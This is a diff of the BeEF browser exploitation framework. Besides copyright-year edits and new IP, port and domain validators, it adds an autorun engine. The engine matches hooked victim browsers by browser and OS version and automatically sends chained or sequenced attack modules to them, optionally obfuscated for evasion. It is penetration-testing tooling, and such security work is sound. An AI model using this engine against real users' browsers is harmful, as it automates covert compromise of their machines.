--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -32,6 +32,13 @@ require 'core/main/network_stack/api'
 # @note Include the distributed engine
 require 'core/main/distributed_engine/models/rules'

+# @note Include the autorun engine
+require 'core/main/autorun_engine/models/rule'
+require 'core/main/autorun_engine/models/execution'
+require 'core/main/autorun_engine/parser'
+require 'core/main/autorun_engine/engine'
+require 'core/main/autorun_engine/rule_loader'
+
 ## @note Include helpers
 require 'core/module'
 require 'core/modules'
@@ -46,6 +53,7 @@ require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/handlers/server'
+require 'core/main/rest/handlers/autorun_engine'
 require 'core/main/rest/api'

 ## @note Include Websocket
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,11 +1,11 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
-  
+
  # Check if the string is not empty and not nil
  # @param [String] str String for testing
  # @return [Boolean] Whether the string is not empty
@@ -22,18 +22,18 @@ module Filters
  # @return [Boolean] Whether or not the only characters in str are specified in chars
  def self.only?(chars, str)
    regex = Regexp.new('[^' + chars + ']')
-    regex.match(str).nil?
+    regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
  end
-        
+
  # Check if one or more characters in 'chars' are in 'str'
  # @param [String] chars List of characters to match
  # @param [String] str String for testing
  # @return [Boolean] Whether one of the characters exists in the string
  def self.exists?(chars, str)
    regex = Regexp.new(chars)
-    not regex.match(str).nil?
+    not regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
  end
-        
+
  # Check for null char
  # @param [String] str String for testing
  # @return [Boolean] If the string has a null character
@@ -98,14 +98,77 @@ module Filters
    return false if not is_non_empty_string?(str)
    only?("a-zA-Z0-9", str)
  end
-        
-  # Check if valid ip address string
-  # @param [String] ip String for testing
-  # @return [Boolean] If the string is a valid IP address
-  # @note only IPv4 compliant
-  def self.is_valid_ip?(ip)
-    return false if not is_non_empty_string?(ip)
-    return true if ip =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})?$/
+
+  # @overload self.is_valid_ip?(version, ip)
+  #   Checks if the given string is a valid IP address
+  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IP address, otherwise false
+  #
+  # @overload self.is_valid_ip?(ip)
+  #   Checks if the given string is either a valid IPv4 or IPv6 address
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
+  def self.is_valid_ip?(version = :both, ip)
+    valid = false
+
+    if is_non_empty_string?(ip)
+      valid = case version.inspect.downcase
+        when /^:ipv4$/
+          ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
+        when /^:ipv6$/
+          ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
+            ([0-9a-f]{1,4}:){1,7}:|
+            ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
+            ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
+            ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
+            ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
+            ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
+            [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
+            :((:[0-9a-f]{1,4}){1,7}|:)|
+            fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
+            ::(ffff(:0{1,4}){0,1}:){0,1}
+            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
+            ([0-9a-f]{1,4}:){1,4}:
+            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
+        when /^:both$/
+          is_valid_ip?(:ipv4, ip) || is_valid_ip?(:ipv6, ip)
+      end ? true : false
+    end
+
+    valid
+  end
+
+  # Checks if the given string is a valid private IP address
+  # @param [String] ip string for testing
+  # @return [Boolean] true if the string is a valid private IP address, otherwise false
+  # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8,
+  #       but does not include local-link addresses.
+  def self.is_valid_private_ip?(ip)
+    return false unless is_valid_ip?(ip)
+    return ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
+  end
+
+  # Checks if the given string is a valid TCP port
+  # @param [String] port string for testing
+  # @return [Boolean] true if the string is a valid TCP port, otherwise false
+  def self.is_valid_port?(port)
+    valid = false
+    valid = true if port.to_i > 0 && port.to_i < 2**16
+    valid
+  end
+
+  # Checks if string is a valid domain name
+  # @param [String] domain string for testing
+  # @return [Boolean] If the string is a valid domain name
+  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of
+  #       TLD's is not static.
+  def self.is_valid_domain?(domain)
+    return false unless is_non_empty_string?(domain)
+    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
    false
  end

@@ -138,6 +201,6 @@ module Filters
    return false if str.length > 200
    true
  end
-  
+
 end
 end
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -51,11 +51,25 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser version characters
  def self.is_valid_browserversion?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return true if str.eql? "UNKNOWN"
+    return true if str.eql? "ALL"
    return false if not nums_only?(str) and not is_valid_float?(str)  
-    return false if str.length > 10      
+    return false if str.length > 20
+    true
+  end
+
+  # Verify the os version string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid os version characters
+  def self.is_valid_osversion?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return true if str.eql? "UNKNOWN"
+    return true if str.eql? "ALL"
+    return false unless BeEF::Filters::only?("a-zA-Z0-9.<=> ", str)
+    return false if str.length > 20
    true
  end

--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -14,8 +14,6 @@ module Filters
    return false if has_non_printable_char?(str)
    return false if str.length > 255
    return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$/).nil?
-    return false if not (str =~ /\.\./).nil?
-    return false if not (str =~ /\-\-/).nil?      
    true
  end

--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -16,7 +16,7 @@ require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
 require 'rubydns'
-require 'sourcify'
+require 'mime/types'

 # @note Include the filters
 require 'core/filters'
--- a/core/main/autorun_engine/engine.rb
+++ b/core/main/autorun_engine/engine.rb
@@ -0,0 +1,458 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module AutorunEngine
+
+      class Engine
+
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+
+          @result_poll_interval = @config.get('beef.autorun.result_poll_interval')
+          @result_poll_timeout = @config.get('beef.autorun.result_poll_timeout')
+          @continue_after_timeout = @config.get('beef.autorun.continue_after_timeout')
+
+          @debug_on = @config.get('beef.debug')
+
+          @VERSION = ['<','<=','==','>=','>','ALL']
+          @VERSION_STR = ['XP','Vista']
+        end
+
+
+        # Prepare and return the JavaScript of the modules to be sent.
+        # It also updates the rules ARE execution table with timings
+        def trigger(rule_ids, hb_id)
+
+          hb = BeEF::HBManager.get_by_id(hb_id)
+          hb_session = hb.session
+
+          rule_ids.each do |rule_id|
+            rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
+            modules = JSON.parse(rule.modules)
+
+            execution_order = JSON.parse(rule.execution_order)
+            execution_delay = JSON.parse(rule.execution_delay)
+            chain_mode  = rule.chain_mode
+
+            mods_bodies = Array.new
+            mods_codes = Array.new
+            mods_conditions = Array.new
+
+            modules.each do |cmd_mod|
+              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
+              options = []
+              replace_input = false
+              cmd_mod['options'].each do|k,v|
+                options.push({'name' => k, 'value' => v})
+                replace_input = true if v == '<<mod_input>>'
+              end
+
+              command_body = prepare_command(mod, options, hb_id, replace_input)
+              mods_bodies.push(command_body)
+              mods_codes.push(cmd_mod['code'])
+              mods_conditions.push(cmd_mod['condition'])
+            end
+
+            # Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
+            case chain_mode
+              when 'nested-forward'
+                wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order)
+              when 'sequential'
+                wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay)
+              else
+                wrapper = nil
+                # TODO catch error, which should never happen as values are checked way before ;-)
+            end
+
+            are_exec = BeEF::Core::AutorunEngine::Models::Execution.new(
+                :session => hb_session,
+                :mod_count => modules.length,
+                :mod_successful => 0,
+                :mod_body => wrapper,
+                :is_sent => false,
+                :rule_id => rule_id
+            )
+            are_exec.save
+            # Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
+            print_more "Triggering ruleset #{rule_ids.to_s} on HB #{hb_id}"
+          end
+        end
+
+
+        # Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
+        # Launch order is also taken care of.
+        #  - sequential chain with delays (setTimeout stuff)
+        #    ex.: setTimeout(module_one(),   0);
+        #         setTimeout(module_two(),   2000);
+        #         setTimeout(module_three(), 3000);
+        # Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring
+        #  what their status will be (for instance, a bunch of XSRFs on a set of targets)
+        def prepare_sequential_wrapper(mods, order, delay)
+          wrapper = ''
+          delayed_exec = ''
+          c = 0
+
+          while c < mods.length
+            delayed_exec += %Q| setTimeout("#{mods[order[c]][:mod_name]}();", #{delay[c]}); |
+            wrapped_mod = "#{mods[order[c]][:mod_body]}\n"
+            wrapper += wrapped_mod
+            c += 1
+          end
+          wrapper += delayed_exec
+          print_more "Final Modules Wrapper:\n #{delayed_exec}" if @debug_on
+          wrapper
+        end
+
+        # Wraps module bodies in their own function, then start to execute them from the first, polling for
+        # command execution status/results (with configurable polling interval and timeout).
+        # Launch order is also taken care of.
+        #  - nested forward chain with status checks (setInterval to wait for command to return from async operations)
+        #    ex.:  module_one()
+        #           if condition
+        #             module_two(module_one_output)
+        #               if condition
+        #                  module_three(module_two_output)
+        #
+        # Note: command result status is checked, and you can properly chain input into output, having also
+        # the flexibility of slightly mangling it to adapt to module needs.
+        # Note: Useful in situations where you want to launch 2 modules, where the second one will execute only
+        #     if the first once return with success. Also, the second module has the possibility of mangling first
+        #     module output and use it as input for some of its module inputs.
+        def prepare_nested_forward_wrapper(mods, code, conditions, order)
+          wrapper, delayed_exec = '',''
+          delayed_exec_footers = Array.new
+          c = 0
+
+          while c < mods.length
+            if mods.length == 1
+              i = c
+            else
+              i = c + 1
+            end
+
+            code_snippet = ''
+            mod_input = ''
+            if code[c] != 'null' && code[c] != ''
+              code_snippet = code[c]
+              mod_input = 'mod_input'
+            end
+
+            conditions[i] = true if conditions[i] == nil || conditions[i] == ''
+
+            if c == 0
+              # this is the first wrapper to prepare
+              delayed_exec += %Q|
+                function #{mods[order[c]][:mod_name]}_f(){
+                  #{mods[order[c]][:mod_name]}();
+
+                  // TODO add timeout to prevent infinite loops
+                  function isResReady(mod_result, start){
+                    if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
+                       // loop
+                    }else{
+                       // module return status/data is now available
+                       clearInterval(resultReady);
+                          if (mod_result === null && #{@continue_after_timeout}){
+                              var mod_result = [];
+                              mod_result[0] = 1; //unknown status
+                              mod_result[1] = '' //empty result
+                          }
+                          var status = mod_result[0];
+                       if(#{conditions[i]}){
+                         #{mods[order[i]][:mod_name]}_can_exec = true;
+                         #{mods[order[c]][:mod_name]}_mod_output = mod_result[1];
+              |
+
+              delayed_exec_footer = %Q|
+                     }
+                    }
+                  }
+                  var start = (new Date()).getTime();
+                  var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_mod_output, start);},#{@result_poll_interval});
+                }
+                #{mods[order[c]][:mod_name]}_f();
+              |
+
+              delayed_exec_footers.push(delayed_exec_footer)
+
+            elsif c < mods.length - 1
+              # this is one of the wrappers in the middle of the chain
+              delayed_exec += %Q|
+                function #{mods[order[c]][:mod_name]}_f(){
+                  if(#{mods[order[c]][:mod_name]}_can_exec){
+                     #{code_snippet}
+                     #{mods[order[c]][:mod_name]}(#{mod_input});
+                     function isResReady(mod_result, start){
+                        if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
+                           // loop
+                        }else{
+                           // module return status/data is now available
+                         clearInterval(resultReady);
+                          if (mod_result === null && #{@continue_after_timeout}){
+                              var mod_result = [];
+                              mod_result[0] = 1; //unknown status
+                              mod_result[1] = '' //empty result
+                          }
+                          var status = mod_result[0];
+                          if(#{conditions[i]}){
+                             #{mods[order[i]][:mod_name]}_can_exec = true;
+                             #{mods[order[c]][:mod_name]}_mod_output = mod_result[1];
+              |
+
+              delayed_exec_footer = %Q|
+                         }
+                       }
+                     }
+                     var start = (new Date()).getTime();
+                     var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_mod_output, start);},#{@result_poll_interval});
+                  }
+                }
+                #{mods[order[c]][:mod_name]}_f();
+              |
+
+              delayed_exec_footers.push(delayed_exec_footer)
+            else
+              # this is the last wrapper to prepare
+              delayed_exec += %Q|
+                function #{mods[order[c]][:mod_name]}_f(){
+                  if(#{mods[order[c]][:mod_name]}_can_exec){
+                     #{code_snippet}
+                     #{mods[order[c]][:mod_name]}(#{mod_input});
+                  }
+                }
+                #{mods[order[c]][:mod_name]}_f();
+              |
+            end
+            wrapped_mod = "#{mods[order[c]][:mod_body]}\n"
+            wrapper += wrapped_mod
+            c += 1
+          end
+          wrapper += delayed_exec + delayed_exec_footers.reverse.join("\n")
+          print_more "Final Modules Wrapper:\n #{delayed_exec + delayed_exec_footers.reverse.join("\n")}" if @debug_on
+          wrapper
+        end
+
+
+        # prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
+        # and store it in the database.
+        # Returns the raw module body after template substitution.
+        def prepare_command(mod, options, hb_id, replace_input)
+          config = BeEF::Core::Configuration.instance
+          begin
+            command = BeEF::Core::Models::Command.new(
+                :data => options.to_json,
+                :hooked_browser_id => hb_id,
+                :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
+                :creationdate => Time.new.to_i,
+                :instructions_sent => true
+            )
+            command.save
+
+            command_module = BeEF::Core::Models::CommandModule.first(:id => mod.id)
+            if (command_module.path.match(/^Dynamic/))
+              # metasploit and similar integrations
+              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
+            else
+              # normal modules always here
+              key = BeEF::Module.get_key_by_database_id(mod.id)
+              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
+            end
+
+            hb = BeEF::HBManager.get_by_id(hb_id)
+            hb_session = hb.session
+            command_module.command_id = command.id
+            command_module.session_id = hb_session
+            command_module.build_datastore(command.data)
+            command_module.pre_send
+
+            build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              command_body = evasion.obfuscate(command_module.output) + "\n\n"
+            else
+              command_body = command_module.output  + "\n\n"
+            end
+
+            # @note prints the event to the console
+            print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]"
+
+            replace_input ? mod_input = 'mod_input' : mod_input = ''
+            result = %Q|
+                var #{mod.name} = function(#{mod_input}){
+                    #{clean_command_body(command_body, replace_input)}
+                };
+                var #{mod.name}_can_exec = false;
+                var #{mod.name}_mod_output = null;
+            |
+
+            return {:mod_name => mod.name, :mod_body => result}
+          rescue =>  e
+            print_error e.message
+            print_debug e.backtrace.join("\n")
+          end
+        end
+
+        # Removes the beef.execute wrapper in order that modules are executed in the ARE wrapper, rather than
+        # using the default behavior of adding the module to an array and execute it at polling time.
+        #
+        # Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input
+        def clean_command_body(command_body, replace_input)
+          begin
+            cmd_body = command_body.lines.map(&:chomp)
+            wrapper_start_index,wrapper_end_index = nil
+            cmd_body.each_with_index do |line, index|
+              if line.include?('beef.execute(function()')
+                wrapper_start_index = index
+                break
+              end
+            end
+
+            cmd_body.reverse.each_with_index do |line, index|
+              if line.include?('});')
+                wrapper_end_index = index
+                break
+              end
+            end
+
+            cleaned_cmd_body = cmd_body.slice(wrapper_start_index+1..-(wrapper_end_index+2)).join("\n")
+
+            # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
+            if replace_input
+              if cleaned_cmd_body.include?('"<<mod_input>>"')
+                final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"','mod_input')
+              elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
+                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
+              elsif cleaned_cmd_body.include?('<<mod_input>>')
+                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
+              else
+                return cleaned_cmd_body
+              end
+              return final_cmd_body
+            else
+              return cleaned_cmd_body
+            end
+          rescue =>  e
+            print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body.dd"
+          end
+        end
+
+
+        # Checks if there are any ARE rules to be triggered for the specified hooked browser
+        #
+        # Note: browser version checks are supporting only major versions, ex: C 43, IE 11
+        # Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
+        #
+        # Returns an array with rule IDs that matched and should be triggered.
+        # if rule_id is specified, checks will be executed only against the specified rule (useful
+        #  for dynamic triggering of new rulesets ar runtime)
+        def match(browser, browser_version, os, os_version, rule_id=nil)
+          match_rules = []
+          if rule_id != nil
+            rules = [BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)]
+          else
+            rules = BeEF::Core::AutorunEngine::Models::Rule.all()
+          end
+          return nil if rules == nil
+
+          print_info "[ARE] Checking if any defined rules should be triggered on target."
+          # TODO handle cases where there are multiple ARE rules for the same hooked browser.
+          # TODO the above works well, but maybe rules need to have priority or something?
+          rules.each do |rule|
+            begin
+              browser_match, os_match = false, false
+
+              b_ver_cond = rule.browser_version.split(' ').first
+              b_ver = rule.browser_version.split(' ').last
+
+              os_ver_rule_cond = rule.os_version.split(' ').first
+              os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
+              os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
+
+              # Most of the times Linux/*BSD OS doesn't return any version
+              # (TODO: improve OS detection on these operating systems)
+              if os_version != nil && !@VERSION_STR.include?(os_version)
+                os_ver_hook_maj = os_version.split('.').first
+                os_ver_hook_min = os_version.split('.').last
+
+                # the following assignments to 0 are need for later checks like:
+                # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
+                os_ver_hook_min = 0 if os_version.split('.').length == 1
+                os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
+              else
+                # most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
+                # to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
+                # we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
+                  os_ver_hook_maj, os_ver_hook_min = 5, 0 if os_version == 'XP'
+                  os_ver_hook_maj, os_ver_hook_min = 6, 0 if os_version == 'Vista'
+              end
+
+              os_ver_rule_maj, os_ver_rule_min = 5, 0 if os_ver_rule_maj == 'XP'
+              os_ver_rule_maj, os_ver_rule_min = 6, 0 if os_ver_rule_maj == 'Vista'
+
+              next unless @VERSION.include?(b_ver_cond)
+              next unless BeEF::Filters::is_valid_browserversion?(b_ver)
+
+              next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
+              # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
+
+              # check if the browser and OS types do match
+              next unless rule.browser == 'ALL'  || browser == rule.browser
+              next unless rule.os == 'ALL'       || os == rule.os
+
+              # check if the browser version match
+              browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
+              if browser_version_match
+                browser_match = true
+              else
+                browser_match = false
+              end
+
+              print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
+
+              # check if the OS versions match
+              if os_version != nil || rule.os_version != 'ALL'
+                os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
+                os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
+              else
+                # os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
+                os_major_version_match, os_minor_version_match = true, true
+              end
+
+              os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
+              print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
+
+              if browser_match && os_match
+                print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
+                match_rules.push(rule.id)
+              end
+            rescue =>  e
+              print_error e.message
+              print_debug e.backtrace.join("\n")
+            end
+          end
+          print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
+
+          return match_rules
+        end
+
+        # compare versions
+        def compare_versions(ver_a, cond, ver_b)
+          return true if cond == 'ALL'
+          return true if cond == '==' && ver_a == ver_b
+          return true if cond == '<=' && ver_a <= ver_b
+          return true if cond == '<'  && ver_a <  ver_b
+          return true if cond == '>=' && ver_a >= ver_b
+          return true if cond == '>'  && ver_a >  ver_b
+          return false
+        end
+      end
+    end
+  end
+end
--- a/core/main/autorun_engine/models/execution.rb
+++ b/core/main/autorun_engine/models/execution.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module AutorunEngine
+      module Models
+        # @note Stored info about the execution of the ARE on hooked browsers.
+        class Execution
+
+          include DataMapper::Resource
+
+          storage_names[:default] = 'core_areexecution'
+
+          property :id, Serial
+          property :session, Text                         # hooked browser session where a ruleset triggered
+          property :mod_count, Integer                    # number of command modules of the ruleset
+          property :mod_successful, Integer               # number of command modules that returned with success
+          # By default Text is only 65K, so field length increased to 1 MB
+          property :mod_body, Text,    :length => 1024000 # entire command module(s) body to be sent
+          property :exec_time, String, :length => 15      # timestamp of ruleset triggering
+          property :is_sent, Boolean
+        end
+      end
+    end
+  end
+end
--- a/core/main/autorun_engine/models/rule.rb
+++ b/core/main/autorun_engine/models/rule.rb
@@ -0,0 +1,34 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module AutorunEngine
+      module Models
+        # @note Table stores the rules for the Distributed Engine.
+        class Rule
+          include DataMapper::Resource
+
+          storage_names[:default] = 'core_arerules'
+
+          property :id, Serial
+          property :name, Text                                       # rule name
